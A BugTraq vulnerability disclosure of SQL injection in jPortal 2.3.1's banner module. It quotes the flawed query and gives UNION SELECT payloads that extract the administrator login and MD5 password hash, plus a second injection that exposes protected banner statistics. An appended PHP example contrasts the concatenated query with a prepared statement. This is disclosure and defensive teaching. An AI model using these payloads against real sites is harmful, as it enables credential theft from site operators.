Hello BugTraq,

I've found a possibility to inject SQL code in jPortal version 2.3.1, in the module "banner" (module/banner.inc.php).

The bug is in this line of code (line 192):

    $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";

The variable $haslo is unfiltered. To patch this code, just add this before the above line:

    $haslo = addslashes($haslo);

PoC: go to http://[victim]/jportal/banner.php and try this:

    ' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

and then:

    ' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

After that, you obtain the login and the MD5 password hash of the administrator.

PoC 2: try to inject this code:

    ' or id='x

    x - banner id

After that, you can see the statistics of banners to which you haven't got passwords.

The vendor (http://jportal2.com) has already been informed.

--
Best regards,
Marcin "CiNU5" Krupowicz
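
The line-192 query pattern next to a bound-parameter form, as an added example that is not part of the original post or of jPortal's code. It uses a prepared statement instead of the addslashes() patch suggested above, and assumes PDO with an in-memory SQLite table; the names `banners`, `lookup_concat` and `lookup_bound` and the sample rows are constructed for illustration.

```php
<?php
// Added example, not jPortal code. The table is a constructed stand-in for
// $bann_a_tbl; requires the pdo_sqlite extension.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE banners (id INTEGER PRIMARY KEY, title TEXT, views INTEGER)");
$db->exec("INSERT INTO banners (title, views) VALUES ('alice-secret', 120), ('bob-secret', 45)");

// Pattern from banner.inc.php line 192: input is concatenated into the SQL text,
// so a quote in $haslo ends the string literal and the rest is parsed as SQL.
function lookup_concat(PDO $db, string $haslo): array {
    $query = "SELECT * FROM banners WHERE title='$haslo' ORDER BY id DESC";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the SQL text is fixed and $haslo is sent as a bound value,
// so it is only ever compared against the title column.
function lookup_bound(PDO $db, string $haslo): array {
    $stmt = $db->prepare("SELECT * FROM banners WHERE title = :haslo ORDER BY id DESC");
    $stmt->execute([':haslo' => $haslo]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$inputs = [
    'alice-secret',   // value that matches a constructed row
    "' or id='2",     // PoC 2 from the post, with x = 2
];
foreach ($inputs as $haslo) {
    printf("%-14s concat=%d row(s)  bound=%d row(s)\n",
        $haslo,
        count(lookup_concat($db, $haslo)),
        count(lookup_bound($db, $haslo)));
}
```

For the second input the concatenated query returns the row with id 2, while the bound query returns no rows because no title equals that literal string.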